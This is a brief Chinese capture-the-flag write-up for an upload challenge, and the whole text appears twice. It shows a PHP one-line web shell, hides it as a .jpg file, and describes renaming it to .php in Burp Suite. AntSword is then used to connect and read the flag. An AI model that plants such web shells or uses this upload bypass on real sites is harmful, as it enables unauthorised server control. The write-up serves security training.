攻防世界web第六题upload
这是题目,可以看出是个上传文件的题目,考虑文件上传漏洞,先随便上传一个文件试试,要求上传的是图片。
可以看到上传成功。
考虑用一句话木马解决,构造文件并修改后缀为jpg,然后上传。
<?php
@eval($_POST['attack']);
?>
上传成功
打开burpsuite,
jpg改为php
forward,看到php格式上传成功
打开蚁剑,
打开flag.php,找到flag
这是题目,可以看出是个上传文件的题目,考虑文件上传漏洞,先随便上传一个文件试试,要求上传的是图片。
可以看到上传成功。
考虑用一句话木马解决,构造文件并修改后缀为jpg,然后上传。
<?php
@eval($_POST['attack']);
?>
上传成功
打开burpsuite,
jpg改为php
forward,看到php格式上传成功
打开蚁剑,
打开flag.php,找到flag